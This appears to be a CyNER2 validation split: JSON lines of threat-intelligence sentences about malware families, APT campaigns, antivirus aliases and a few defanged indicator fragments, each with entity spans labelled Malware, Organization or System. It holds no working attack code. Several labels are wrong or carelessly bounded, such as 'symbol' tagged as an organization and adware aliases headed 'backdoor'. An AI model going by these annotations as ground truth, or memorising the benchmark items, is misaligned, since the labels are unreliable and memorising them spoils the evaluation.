{"text": "A backdoor also known as: Trojan.Win32.Inject.wuxxl TROJ_SPNR.0CCG12 Trojan.Injector!ChMY8oc2Znc Trojan.Win32.S.Klibot.90112.A Trojan.Inject.64029 TR/Buzus.90112.7 TROJ_SPNR.0CCG12 Win32.Troj.Undef.kcloud Trojan:Win32/Klibot.A Virus.Win32.CeeInject W32/Injector.HXK!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001378", "source": "cyner2_valid"}}
{"text": "Mcafee has recently seen some interesting tactical changes, including: Attachments with the malicious executable inside Microsoft Office documents that contain a malicious macro.", "spans": {"Organization: Mcafee": [[0, 6]], "System: Microsoft Office documents": [[120, 146]], "Malware: malicious macro.": [[162, 178]]}, "info": {"id": "cyner2_valid_001379", "source": "cyner2_valid"}}
{"text": "Before interpreting the opcode , the VM decrypts the opcode ’ s content ( through a simple XOR algorithm ) , which it then relocates ( if needed ) , using the relocation fields .", "spans": {}, "info": {"id": "cyner2_valid_001380", "source": "cyner2_valid"}}
{"text": "Specifically, it's the first malware we've seen in the wild that abuses private APIs in the iOS system to implement malicious functionalities.", "spans": {"Malware: malware": [[29, 36]], "System: iOS system": [[92, 102]]}, "info": {"id": "cyner2_valid_001381", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Troj.W32.Wildpositron!c Win32.Trojan.WisdomEyes.16070401.9500.9966 Backdoor.Duuzer W32/WildPositron.OTL!tr Trojan/Win32.WildPositron Backdoor:Win32/Escad.S!dha Win32/Trojan.af9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001382", "source": "cyner2_valid"}}
{"text": "One of the export calls used is to check if the victimized system is located in Brazil.", "spans": {"Malware: export": [[11, 17]]}, "info": {"id": "cyner2_valid_001383", "source": "cyner2_valid"}}
{"text": "After installation, the application runs in the background as service.", "spans": {"System: application": [[24, 35]]}, "info": {"id": "cyner2_valid_001384", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Ronathim.A4 TROJ_VB.DQO Trojan.VB-47165 Trojan.Win32.VB.alvj TR/Kryptik.FA TROJ_VB.DQO Trojan:Win32/Ronathim.A Trojan.Win32.A.VB.245760 Trojan/Win32.VB Trojan.VBRA.013935 Win32/VB.NYR Trojan.Ronathim!4287 W32/VB.ALVJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001385", "source": "cyner2_valid"}}
{"text": "Ginp - A malware patchwork borrowing from Anubis November 2019 Intro ThreatFabric analysts have recently investigated an interesting new strain of banking malware .", "spans": {"Malware: Ginp": [[0, 4]], "Malware: Anubis": [[42, 48]], "System: ThreatFabric": [[69, 81]]}, "info": {"id": "cyner2_valid_001386", "source": "cyner2_valid"}}
{"text": "campaigns in multiple different countries.", "spans": {}, "info": {"id": "cyner2_valid_001388", "source": "cyner2_valid"}}
{"text": "So how does Android.Bankosy take advantage of voice-based 2FA?", "spans": {"Malware: Android.Bankosy": [[12, 27]], "Vulnerability: advantage of voice-based 2FA?": [[33, 62]]}, "info": {"id": "cyner2_valid_001389", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Apher!O Win32.Trojan.WisdomEyes.16070401.9500.9969 Win32/SillyDl.CSE Trojan-Downloader.Win32.Apher.o TrojWare.Win32.TrojanDownloader.Apher.U0 Trojan.DownLoader6.31749 Trojan-Downloader.Win32.Apher.o Win32/SpyBot.WA.downloader", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001391", "source": "cyner2_valid"}}
{"text": "We call it the XM1RPC campaign due to the common backdoor used across all of the compromised sites.", "spans": {"Malware: backdoor": [[49, 57]]}, "info": {"id": "cyner2_valid_001392", "source": "cyner2_valid"}}
{"text": "Today, Kelihos is in a festive mood and giving away a free Amazon Gift Card especially for US customers.", "spans": {"Malware: Kelihos": [[7, 14]], "Organization: customers.": [[94, 104]]}, "info": {"id": "cyner2_valid_001393", "source": "cyner2_valid"}}
{"text": "The information is then stored in local app database as well as sent to the backend .", "spans": {}, "info": {"id": "cyner2_valid_001395", "source": "cyner2_valid"}}
{"text": "This translates into a kit that will largely evade traditional blacklisting solutions.", "spans": {"Malware: kit": [[23, 26]]}, "info": {"id": "cyner2_valid_001396", "source": "cyner2_valid"}}
{"text": "I would first like to credit TrendMicro with their initial research on FighterPOS.", "spans": {"Organization: TrendMicro": [[29, 39]], "Malware: FighterPOS.": [[71, 82]]}, "info": {"id": "cyner2_valid_001397", "source": "cyner2_valid"}}
{"text": "] it Bologna server3ct.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner2_valid_001399", "source": "cyner2_valid"}}
{"text": "Conclusion Smishing ( SMS phishing ) offers a unique vector to infect mobile users .", "spans": {}, "info": {"id": "cyner2_valid_001400", "source": "cyner2_valid"}}
{"text": "] infoal-amalhumandevelopment [ .", "spans": {}, "info": {"id": "cyner2_valid_001401", "source": "cyner2_valid"}}
{"text": "Around July last year, more than a 100 Israeli servicemen were hit by a cunning threat actor.", "spans": {"Organization: 100 Israeli servicemen": [[35, 57]]}, "info": {"id": "cyner2_valid_001402", "source": "cyner2_valid"}}
{"text": "Zscaler ThreatLabZ came across a new Infostealer Trojan written in .NET that utilizes popular tools like Fiddler Json.NET for its operation.", "spans": {"Organization: Zscaler": [[0, 7]], "Organization: ThreatLabZ": [[8, 18]], "Malware: Infostealer Trojan": [[37, 55]], "Malware: tools": [[94, 99]], "Malware: Fiddler Json.NET for": [[105, 125]]}, "info": {"id": "cyner2_valid_001403", "source": "cyner2_valid"}}
{"text": "These accounts are created by abusing accessibility services .", "spans": {}, "info": {"id": "cyner2_valid_001404", "source": "cyner2_valid"}}
{"text": "This new organization proposed the creation of a more secure Android phone .", "spans": {"System: Android": [[61, 68]]}, "info": {"id": "cyner2_valid_001405", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TikoraxaDSB.Trojan Dropped:Application.BitCoinMiner.TF BehavesLike.Win32.Trojan.fh TR/Dldr.Bitsadmin.TW TrojanDownloader:Win32/Sminager.F Trj/CI.A Trojan.DL.Alien! Dloader.X!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001406", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: AdWare.Downloader.Addrop", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001407", "source": "cyner2_valid"}}
{"text": "As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear.", "spans": {}, "info": {"id": "cyner2_valid_001408", "source": "cyner2_valid"}}
{"text": "The RAT stores all the data in a database ( DB ) in order to send it to the Command & Control ( C & C ) server .", "spans": {}, "info": {"id": "cyner2_valid_001409", "source": "cyner2_valid"}}
{"text": "Snake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks.", "spans": {"Malware: Snake,": [[0, 6]], "Malware: Turla, Uroburos": [[21, 36]], "Malware: malware framework": [[76, 93]]}, "info": {"id": "cyner2_valid_001410", "source": "cyner2_valid"}}
{"text": "The Trojan for Linux designed to carry out DDoS attacks.", "spans": {"Malware: Trojan for": [[4, 14]], "System: Linux": [[15, 20]]}, "info": {"id": "cyner2_valid_001411", "source": "cyner2_valid"}}
{"text": "After the installation, the application does not immediately show its true colours, in fact the malicious activities are postponed for a couple of minutes so users can for example first use the app to open funny videos or watch the latest news.", "spans": {}, "info": {"id": "cyner2_valid_001412", "source": "cyner2_valid"}}
{"text": "Figure 1 shows one such landing page using stolen branding from Bank Austria .", "spans": {}, "info": {"id": "cyner2_valid_001413", "source": "cyner2_valid"}}
{"text": "A targeted phishing campaign was active in early August 2017 delivering Подписать документы.doc translates to Sign Documents.doc , a MS Word document with an embedded macro responsible for dropping both the CHTHONIC banking trojan and DIMNIE spyware to an infected machine.", "spans": {"Malware: embedded macro": [[158, 172]], "Malware: the CHTHONIC banking trojan": [[203, 230]], "Malware: DIMNIE spyware": [[235, 249]], "System: an infected machine.": [[253, 273]]}, "info": {"id": "cyner2_valid_001414", "source": "cyner2_valid"}}
{"text": "Example of a command that steals specific files from an infected device ’ s application ( top ) , and GolfSpy ’ s parse-and-perform command ( bottom ) Apart from the HTTP POST method , GolfSpy also creates a socket connection to the remote C & C server in order to receive and perform additional commands .", "spans": {"Malware: GolfSpy": [[102, 109], [185, 192]]}, "info": {"id": "cyner2_valid_001415", "source": "cyner2_valid"}}
{"text": "This report describes an elaborately staged malware operation with targets in the Syrian opposition.", "spans": {"Organization: Syrian opposition.": [[82, 100]]}, "info": {"id": "cyner2_valid_001416", "source": "cyner2_valid"}}
{"text": "delivered well-known backdoor variants like Gamarue.", "spans": {"Malware: backdoor": [[21, 29]], "Malware: Gamarue.": [[44, 52]]}, "info": {"id": "cyner2_valid_001418", "source": "cyner2_valid"}}
{"text": "Sophisticated campaign targeting individuals within the Mongolian government.", "spans": {"Organization: individuals": [[33, 44]], "Organization: the Mongolian government.": [[52, 77]]}, "info": {"id": "cyner2_valid_001419", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.Diamin.a DIAL_DIAMIN.YG Win.Trojan.Dialer-856 Troj.W32.Diamin.l3NB TrojWare.Win32.Diamin.A Dialer.Diamin.68 DIAL_DIAMIN.YG Trojan.Win32.Dialer Trojan:Win32/Diamin.F Trojan/Win32.Dialer.R7699 W32/Dialer.SL!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001420", "source": "cyner2_valid"}}
{"text": "Additionally , some copies of Exodus One use the following XOR key : Rino Gattuso is a famous retired Italian footballer , originally from Calabria .", "spans": {}, "info": {"id": "cyner2_valid_001421", "source": "cyner2_valid"}}
{"text": "Defense against FinFisher Exposing as much of FinFisher ’ s riddles as possible during this painstaking analysis has allowed us to ensure our customers are protected against this advanced piece of malware .", "spans": {"Malware: FinFisher": [[16, 25], [46, 55]]}, "info": {"id": "cyner2_valid_001422", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Crypren Ransom.FileCryptor.MSIL Troj.Ransom.W32.Crypren!c Ransom_Cryptid.R020C0DAF18 Trojan-Ransom.Win32.Crypren.aedj Trojan.Win32.Z.Ransom.36864.C Ransom_Cryptid.R020C0DAF18 BehavesLike.Win32.Trojan.nz Trojan.Crypren.kx TR/Paradise.sbeoo Trojan-Ransom.Win32.Crypren.aedj Hoax.Crypren Trj/GdSda.A Win32.Trojan.Crypren.Ecup Trojan-Ransom.FileCoder Win32/Trojan.929", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001423", "source": "cyner2_valid"}}
{"text": "With the potential to sell access to these devices to the highest bidder, Check Point researchers say similar malware campaigns may become a trend.", "spans": {"System: devices": [[43, 50]], "Organization: Check Point researchers": [[74, 97]]}, "info": {"id": "cyner2_valid_001425", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W64/Trojan.EUMI-4574 Trojan.Trick.45175 BehavesLike.Win64.Dropper.cm Trojan/Win32.Trickster Trojan:Win64/Totbrick.A Trojan/Win32.Trickster.C1931466 Trojan.Win64.Trickbot", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001426", "source": "cyner2_valid"}}
{"text": "Based on the findings, Talos remains confident that the attack was destructive in nature.", "spans": {}, "info": {"id": "cyner2_valid_001427", "source": "cyner2_valid"}}
{"text": "In the case reported on by SensePost, this allowed for the fetching or downloading of remote payloads, using PowerShell for example.", "spans": {"Organization: SensePost,": [[27, 37]], "Malware: remote payloads,": [[86, 102]], "Malware: PowerShell": [[109, 119]]}, "info": {"id": "cyner2_valid_001428", "source": "cyner2_valid"}}
{"text": "APT28 has recently focused on using different themes.", "spans": {}, "info": {"id": "cyner2_valid_001429", "source": "cyner2_valid"}}
{"text": "Mobile devices are at the frontier of cyber espionage , and other criminal motives .", "spans": {}, "info": {"id": "cyner2_valid_001430", "source": "cyner2_valid"}}
{"text": "As rooting exploits on Android become less prevalent and lucrative , PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud .", "spans": {"System: Android": [[23, 30]]}, "info": {"id": "cyner2_valid_001431", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9986 Trojan.Win32.Pabin.bdv Trojan.Win32.Pabin.etvjly Win32.Trojan.Pabin.Pgmm Trojan.DownLoader26.9492 Trojan.Zusy.D3AED5 Trojan.Win32.Pabin.bdv Trojan:MSIL/Alohahaha.A Trojan/Win32.Pabin.R200797 Trojan.Pabin Trj/GdSda.A Win32/Trojan.Spy.155", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001434", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DropperFarfli.Trojan Trojan-Dropper.Win32.Binder!O Backdoor.Farfli.O Trojan/Farfli.ej Win32.Backdoor.DarkAngle.a Backdoor.Trojan BKDR_ZEGOST.SMT Win.Spyware.Magania-20683 Backdoor.Win32.Zegost.mtcgx Trojan.Win32.Graz.pmawx Trojan.Win32.A.PSW-Magania.144384.AD Backdoor.Win32.Gh0st.au TrojWare.Win32.Farfli.LK Trojan.DownLoader7.28359 Trojan.Farfli.Win32.5816 BKDR_ZEGOST.SMT W32.Trojan.Farfli TR/Drop.Farfli.E.355 Trojan[GameThief]/Win32.Magania TrojanDropper:Win32/Farfli.E Trojan.Barys.416 Backdoor.Win32.Zegost.mtcgx Dropper/Win32.OnlineGameHack.R3269 TrojanDropper.Binder Trojan.DR.Binder!mFx5gbiyT10 Trojan-GameThief.Win32.Magania Backdoor.Win32.Gh0st.FC", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001435", "source": "cyner2_valid"}}
{"text": "In addition to the basic functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users.", "spans": {"Malware: backdoors": [[43, 52]], "Malware: T9000": [[62, 67]], "Organization: Skype users.": [[181, 193]]}, "info": {"id": "cyner2_valid_001436", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojanspy.Aolisil Win32.Trojan.WisdomEyes.16070401.9500.9590 Trojan.Win32.Aolisil.exccvy Win32.Trojan.Thief.Azkn Worm.Win32.Dropper.RA TR/Spy.Aolisil.fsmds TrojanSpy:Win32/Aolisil.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001437", "source": "cyner2_valid"}}
{"text": "Arid Viper testing new delivery mechanisms", "spans": {}, "info": {"id": "cyner2_valid_001438", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PUP.Optional.BitCoinMiner Application.Heur2.E9960A Win32.Trojan.WisdomEyes.16070401.9500.9516 Win64.Riskware.BitCoinMiner.E not-a-virus:RiskTool.Win64.BitCoinMiner.bll Riskware.Win64.BitCoinMiner.ewmbqa Program.BitCoinMiner.3 W64/Application.OFLM-1880 RiskTool.BitCoinMiner.abf W32.Bitcoinminer not-a-virus:RiskTool.Win64.BitCoinMiner.bll Trojan/Win64.BitCoinMiner.C1716351", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001439", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Kheagol!AxrLEkZrH0Y TrojanDropper:Win32/Kheagol.C Trojan-Banker.Banker HeurEngine.MaliciousPacker Worm.Win32.Viking.pf Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001440", "source": "cyner2_valid"}}
{"text": "Otherwise , it will return a JSON encoded \" OK , '' and if that is the case , the command to be executed .", "spans": {}, "info": {"id": "cyner2_valid_001441", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Trojan W32/DLoader.AHYXT WORM_FLYSTUD.SM not-a-virus:AdWare.Win32.FlyStudio.l WORM_FLYSTUD.SM Win32/Nuj.KC Virus.Win32.ScramFly!IK Trojan:Win32/Aesevin.B OScope.Trojan.EPL.Goopl Backdoor.Trojan Virus.Win32.ScramFly Trj/FlyStudio.BI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001442", "source": "cyner2_valid"}}
{"text": "The 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.", "spans": {}, "info": {"id": "cyner2_valid_001443", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Small.44856 Trojan/VB.rqn Win32.Trojan.WisdomEyes.16070401.9500.9868 W32/Trojan2.IJWB Trojan.Win32.VB.cway Trojan.Win32.VB.bacjn Troj.W32.Vb!c W32/Trojan.KJRG-1539 TR/Gontu.B.dll Trojan/Win32.VB Trojan:Win32/Gontu.B!dll Trojan.Win32.VB.cway Trojan/Win32.VB.R16201 Win32.Trojan.Vb.sti Trojan.VB!RX1Ky6tbhy8 Trojan.Win32.VB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001444", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.HLLW.Deloder.A W32.Deloder W32/Deloder.worm Worm.Deloder.Win32.1 W32.W.Deloder.a!c W32/Deloder.A.worm Win32.HLLW.Deloder.A WORM_DELODER.A W32/Deloder.C W32.HLLW.Deloder Win32/Deloder.A WORM_DELODER.A Win.Worm.Deloder-1 Worm.Win32.Deloder.a Win32.HLLW.Deloder.A Riskware.Win32.PsExec.hqgg Win32.Worm.Deloder.Pbyh Win32.HLLW.Deloder.A Worm.Win32.Deloder.A Win32.HLLW.Deloder.A Win32.HLLW.Deloder W32/Deloder.worm W32/Deloder.HMKZ-0403 Worm:Win32/Deloder.A Worm/Win32.Deloder Worm.Deloder.a.kcloud Worm:Win32/Deloder.A Worm.Win32.Deloder.745984 Worm.Win32.Deloder.a Win32/Deloder.worm.745984 Win32.HLLW.Deloder.A Worm.Deloder I-Worm.Deloder.A I-Worm.Deloder.A Backdoor.Win32.Tsunami Win32.HLLW.Deloder.A W32/Deloder.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001445", "source": "cyner2_valid"}}
{"text": "Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it .", "spans": {"Organization: symbol": [[99, 105]]}, "info": {"id": "cyner2_valid_001446", "source": "cyner2_valid"}}
{"text": "Sakula uses HTTP GET and POST communication for command and control C2.", "spans": {"Malware: Sakula": [[0, 6]]}, "info": {"id": "cyner2_valid_001447", "source": "cyner2_valid"}}
{"text": "The primary functionality of this tool is to gather information about the victim.", "spans": {"Malware: tool": [[34, 38]]}, "info": {"id": "cyner2_valid_001448", "source": "cyner2_valid"}}
{"text": "Not so long ago, Kaspersky clients in the United States approached Kaspersky researchers with a request to investigate a new type of malicious software that they were able to recover from their organizations' servers.", "spans": {"Organization: Kaspersky clients": [[17, 34]], "Organization: Kaspersky": [[67, 76]], "Malware: malicious software": [[133, 151]], "System: organizations' servers.": [[194, 217]]}, "info": {"id": "cyner2_valid_001449", "source": "cyner2_valid"}}
{"text": "This eponymous lurking behavior would earn them notoriety until their operations were stymied and the perpetrators arrested.", "spans": {}, "info": {"id": "cyner2_valid_001450", "source": "cyner2_valid"}}
{"text": "The traffic transits in clear and is therefore potentially exposed to man-in-the-middle attacks : At the same time , null will also bind a local shell on 0.0.0.0:6842 .", "spans": {}, "info": {"id": "cyner2_valid_001451", "source": "cyner2_valid"}}
{"text": "Carbanak is a prolific crime group, well known for stealing over one billion dollars from banks in 2015 *Kaspersky estimated loss and more recently orchestrating an attack on the Oracle Micros POS support site that put over one million Point of Sale systems at risk.", "spans": {"Organization: *Kaspersky": [[104, 114]], "System: Oracle Micros POS": [[179, 196]], "System: Point of Sale systems": [[236, 257]]}, "info": {"id": "cyner2_valid_001452", "source": "cyner2_valid"}}
{"text": "In order to infect the victims, the attackers distributed spear-phishing emails containing malicious excel file which when opened dropped a malware capable of downloading additional components and spying on infected systems.", "spans": {"Organization: victims,": [[23, 31]], "Malware: malware": [[140, 147]], "System: infected systems.": [[207, 224]]}, "info": {"id": "cyner2_valid_001453", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.VaraminoR.Trojan P2P-Worm.Win32.Palevo!O TrojanDownloader.Small.AO6 W32/Palevo.eezd Trojan.Graftor.D479B Win.Trojan.Palevo-31897 Trojan-Downloader.Win32.Geral.boyj Trojan.Win32.Dwn.guudm Worm.Win32.A.P2P-Palevo.2115231 Troj.Downloader.W32.Geral!c Trojan.DownLoader5.26538 Dropper.StartPage.Win32.1147 Backdoor.Win32.Wuca TrojanDropper.StartPage.pr WORM/Palevo.HG.2 Win32/Palevo.NQ BScope.P2P-Worm.Palevo Win32.Trojan-downloader.Geral.Pfsq Worm.P2P.Palevo!loSA6JxZFd8 W32/Palevo.E!worm.p2p", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001454", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Vetor8933 Worm.Win32.Delf!O Trojan.Pazzky.A8 TROJ_PAZZKY.SM Win.Trojan.Delf-31409 Trojan.Win32.Scar.jxhs Trojan.Win32.Delf.bobvhf Troj.W32.Scar!c Win32.Trojan.Scar.Hqbv Worm.Win32.Delf.NJO Trojan.DownLoader6.22592 TROJ_PAZZKY.SM BehavesLike.Win32.Dropper.fc Worm/Delf.zj TR/Pazzky.A.164 Worm/Win32.Delf Trojan.Jacard.D13B1A Worm.Win32.A.Delf.350976[UPX] Trojan.Win32.Scar.jxhs Trojan:Win32/Pazzky.A Trojan/Win32.Downloader.R64664 TScope.Trojan.Delf Win32/Delf.NJO W32/Scar.JXHS!tr Trj/CI.A Win32/Worm.4b2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001455", "source": "cyner2_valid"}}
{"text": "The Trojan gets the list of bank phone numbers from its C & C server .", "spans": {}, "info": {"id": "cyner2_valid_001456", "source": "cyner2_valid"}}
{"text": "They have attacked more than 100 companies since January 2023.", "spans": {"Organization: companies": [[33, 42]]}, "info": {"id": "cyner2_valid_001457", "source": "cyner2_valid"}}
{"text": "Through analysis of malicious code, files, and infrastructure it is clear the group behind this campaign is either directly responsible for or has cooperated with the group which conducted Operation Blockbuster Sequel and, ultimately, Operation Blockbuster originally outlined by researchers from Novetta.", "spans": {"Malware: malicious code,": [[20, 35]], "System: infrastructure": [[47, 61]], "Organization: researchers": [[280, 291]], "Organization: Novetta.": [[297, 305]]}, "info": {"id": "cyner2_valid_001458", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DaislyC.Trojan Trojan.Nagram.S83339 Trojan.Downloader Trojan/Vabushky.a Win32.Trojan.WisdomEyes.16070401.9500.9902 W64/Trojan.AXTN-9138 Trojan.Ransomcrypt.E Trojan.Encoder.289 Trojan.Vabushky.Win64.4 BehavesLike.Win64.Trojan.qc Trojan:Win64/Alureon.L Dropper/Win64.Vabushky.R81451 Trojan.Win64.Vabushky Trj/CI.A Win64/Vabushky.A Trojan.Win64.Vabushky W64/Vabushky.A!tr Win32/Trojan.4b0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001459", "source": "cyner2_valid"}}
{"text": "It is typically distributed as a .jar Java archive attachment via spam emails see Figure 1 and relies on social engineering to convince a victim to execute the attachment.", "spans": {}, "info": {"id": "cyner2_valid_001460", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Lunam!O Trojan.Lunam.A3 Trojan/Lunam.a Win32.Trojan.Otfrem.b W32/Trojan2.NMKU W32.SillyFDC.BCR Win32/SillyAutorun.EQP TROJ_LUNAM_0000000.TOMA Win.Trojan.Lunam-1 Trojan.Win32.Lunam.a Trojan.Win32.VB.mjwir Trojan.Win32.A.Lunam.476772 Trojan.Win32.FakeFolder.pb Win32.HLLW.Autoruner.48319 Trojan.Lunam.Win32.1 TROJ_LUNAM_0000000.TOMA BehavesLike.Win32.VBObfus.tm W32/Trojan.ZUUL-8834 Trojan/Lunam.b Trojan/Win32.Lunam Troj.W32.Lunam.tn6c Trojan.Win32.Lunam.a Trojan/Win32.Lunam.R2841 Trojan.VBO.012939 Win32/Otfrem.A Trojan.Win32.Lunam W32/Lunam.A!tr Worm.Win32.FakeFolder.CU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001461", "source": "cyner2_valid"}}
{"text": "It downloads the Poison Ivy malware onto the victim's computer and then launches it.", "spans": {"Malware: Poison Ivy malware": [[17, 35]], "System: the victim's computer": [[41, 62]]}, "info": {"id": "cyner2_valid_001462", "source": "cyner2_valid"}}
{"text": "The Lookout Threat Intelligence team identified that this same Facebook profile has also posted Google Drive links to Android malware belonging to the FrozenCell family attributed to APT-C-27 .", "spans": {"Organization: Lookout Threat Intelligence": [[4, 31]], "Organization: Facebook": [[63, 71]], "System: Google Drive": [[96, 108]], "System: Android": [[118, 125]], "Malware: FrozenCell": [[151, 161]]}, "info": {"id": "cyner2_valid_001464", "source": "cyner2_valid"}}
{"text": "In addition to the clicking activity , Judy displays a large amount of advertisements , which in some cases leave users with no option but clicking on the ad itself .", "spans": {"Malware: Judy": [[39, 43]]}, "info": {"id": "cyner2_valid_001465", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware10 Backdoor.Farfli.K7 Trojan.Farfli.Win32.13589 Trojan/Farfli.ek BKDR_ZEGOST.SMT Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_ZEGOST.SMT Win.Trojan.Nitol-6335025-0 Trojan.Win32.Farfli.bqoghb TrojWare.Win32.Magania.~AAD Trojan.DownLoader8.24132 BehavesLike.Win32.Dropper.wc BDS/Farfli.kj.2 Trojan.Spyrat.1 Backdoor:Win32/Farfli.O Trojan/Win32.OnlineGameHack.R9840 backdoor.win32.gh0st.ay Trojan.Farfli!Mc/Bw6h7dtA Trojan-GameThief.Win32.Magania W32/Farfli.AIL!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001467", "source": "cyner2_valid"}}
{"text": "This unique on-device , just-in-time ( JIT ) approach inspired researchers to dub this malware as “ Agent Smith ” .", "spans": {"Malware: Agent Smith": [[100, 111]]}, "info": {"id": "cyner2_valid_001468", "source": "cyner2_valid"}}
{"text": "Android services are components that can be made to execute independently in the background without the victim 's knowledge .", "spans": {"System: Android": [[0, 7]]}, "info": {"id": "cyner2_valid_001469", "source": "cyner2_valid"}}
{"text": "Key individuals, who are believed to be part of a China-based attack group, have been stealing years of valuable government and corporate information from defense and high technology organizations in the US since 2013 and political and government-related entities in China, Hong Kong, and the Philippines since 2010.", "spans": {"Organization: individuals,": [[4, 16]], "Organization: government": [[113, 123]], "Organization: corporate information": [[128, 149]], "Organization: defense": [[155, 162]], "Organization: high technology organizations": [[167, 196]], "Organization: political": [[222, 231]], "Organization: government-related entities": [[236, 263]]}, "info": {"id": "cyner2_valid_001470", "source": "cyner2_valid"}}
{"text": "After months of investigation, we found that several undisclosed malware and interesting tools used for exfiltration purposes were used in this campaign.", "spans": {"Malware: malware": [[65, 72]], "Malware: tools": [[89, 94]]}, "info": {"id": "cyner2_valid_001471", "source": "cyner2_valid"}}
{"text": "These targets include privatized government agencies and government contractors, as well as companies in the consumer electronics, computer, healthcare, and financial industries.", "spans": {"Organization: privatized government agencies": [[22, 52]], "Organization: government contractors,": [[57, 80]], "Organization: companies": [[92, 101]], "Organization: consumer electronics, computer, healthcare,": [[109, 152]], "Organization: financial industries.": [[157, 178]]}, "info": {"id": "cyner2_valid_001472", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Script.Dwn.eqrgom Trojan.KLZM-7 TrojanDownloader:JS/NeutrinoEK.Y virus.js.qexvmc.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001473", "source": "cyner2_valid"}}
{"text": "] com hxxp : //sagawa-reg [ .", "spans": {}, "info": {"id": "cyner2_valid_001474", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32/Trojan.673", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001475", "source": "cyner2_valid"}}
{"text": "In the early days of malware, we all remember analyzing samples of IRC botnets that were relatively simple, where the malware would connect to a random port running IRC, joining the botnet and waiting for commands from their leader.", "spans": {"Malware: malware,": [[21, 29]], "Malware: IRC botnets": [[67, 78]], "Malware: malware": [[118, 125]], "Malware: botnet": [[182, 188]]}, "info": {"id": "cyner2_valid_001476", "source": "cyner2_valid"}}
{"text": "Based on this information , Talos assesses with high confidence that the malware is the same and this is , in fact , the Gustuff malware .", "spans": {"Organization: Talos": [[28, 33]], "Malware: Gustuff": [[121, 128]]}, "info": {"id": "cyner2_valid_001477", "source": "cyner2_valid"}}
{"text": "This method allows Dridex to perform sneaky injections to evade AV solutions.", "spans": {"Malware: Dridex": [[19, 25]], "System: AV": [[64, 66]]}, "info": {"id": "cyner2_valid_001478", "source": "cyner2_valid"}}
{"text": "Wallex is a modular trojan that can download modules from a remote C&C", "spans": {"Malware: Wallex": [[0, 6]], "Malware: trojan": [[20, 26]]}, "info": {"id": "cyner2_valid_001479", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: JS.Locky.JI VBS/Downldr.HM VB:Trojan.Downloader.JTTI VB:Trojan.Downloader.JTTI Trojan.Script.Vbs-heuristic.druvzi VB:Trojan.Downloader.JTTI VBS.DownLoader.983 Trojan-Ransom.Script.Locky", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001480", "source": "cyner2_valid"}}
{"text": "Droppers Per Device Avg .", "spans": {}, "info": {"id": "cyner2_valid_001482", "source": "cyner2_valid"}}
